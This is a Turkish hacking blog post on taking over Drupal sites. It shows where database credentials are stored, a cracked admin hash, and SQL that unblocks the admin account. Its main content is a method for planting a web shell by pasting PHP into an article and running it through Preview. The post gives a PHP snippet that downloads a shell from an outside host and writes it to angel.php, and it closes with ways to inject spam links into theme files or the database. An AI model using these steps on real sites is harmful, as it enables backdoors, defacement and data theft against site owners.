Drupal İnceleme Vol1. #BİGSTAR

Drupal siteler önceden güvenilir bir cms olarak ön planda idi ancak son senelerde birçok açığı tespit edildi , otomatik şifre resetleyiciye kadar (eski token açığı gibi)..

Drupal sitelerin config dosyaları biraz şaşırtıcıdır , db adı şifre gibi bilgileri array içinde yer alır , config dosyasının bulunduğu konum ise şöyledir /sites/default/settings.php

 

örnek config kısmı

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'amis2min_amisdb',
      'username' => 'amis2min_amisdb',
      'password' => 'amisdb',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

örnek drupalşifre hash : $S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu = admin

mysql execute ile adminin üyeliğinin yasağını kaldırmak.

UPDATE users SET status = 1 WHERE uid=1;

Drupal sitelerin admin paneline girdikten sonra shell yüklemek içni herhangi bir upload alanı yoktur bu yüzden content kısmından yani makale eklenen kısımdan makale yerine shell kodlarınızı yapıştırmanız gerekir ve ayrıca text format kısmını PHP code olarak değiştirmeniz gerekir böylece shell kodlarınızı yolladığınız makale sayfasında çalıştırabilesiniz. Bazı drupal sitelerde shell kodlarını girdikten sonra sayfayı yolla demenize rağmen hata verebilir ve bir güvenlik önlemi alınmış olup makaleyi yollamanıza izin vermeyebilir , böyle durumlarda Preview (önizleme) özelliğini kullanmalısınız. Ön izleme sayesinde makaleyi yollamadan php kodunu test sayfasında çalıştırabilirsiniz , ancak bu test sayfasında shell çalıştırmanız sizin bir işinize yaramaz çünki herhangi bir butona tıkladığınız anda shell geçersiz konuma düşecektir ! bu sebepten tek çalıştırmalık bir kod hazırlamanız gerekmekte , yani preview dediğiniz anda siteye dışardan shelli çekip yüklemiş olsun , aşağıdaki örnek koda bakabilirsiniz.

$file = file_get_contents('http://w0rms.com/shell/angel.txt');
$b = fopen('angel.php', 'w');
fwrite($b,$file);
fclose($b);
print 'Başarılı ! <a href=angel.php></a>';

Drupal sitelere linkini eklemek istiyorsanız tema dosyası içinden html.tpl.php / home.tpl.php dosyasına eklemeniz yeterli olacaktır. eğer mysqldan eklemek istiyorsanız block_custom tablosu işinizi görecektir.

Son Konular

Bigstar Yazar:

Bir Bilişimci'den daha fazlası... WebDeveloper, WebMaster, WebDesigner,Grafiker, WebSecurity, Defansive and Ofansive Hacking Conference Code,Pentests, Rootkits, Malware, Exploits, Redteaming, Offsec....

İlk Yorumu Siz Yapın

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir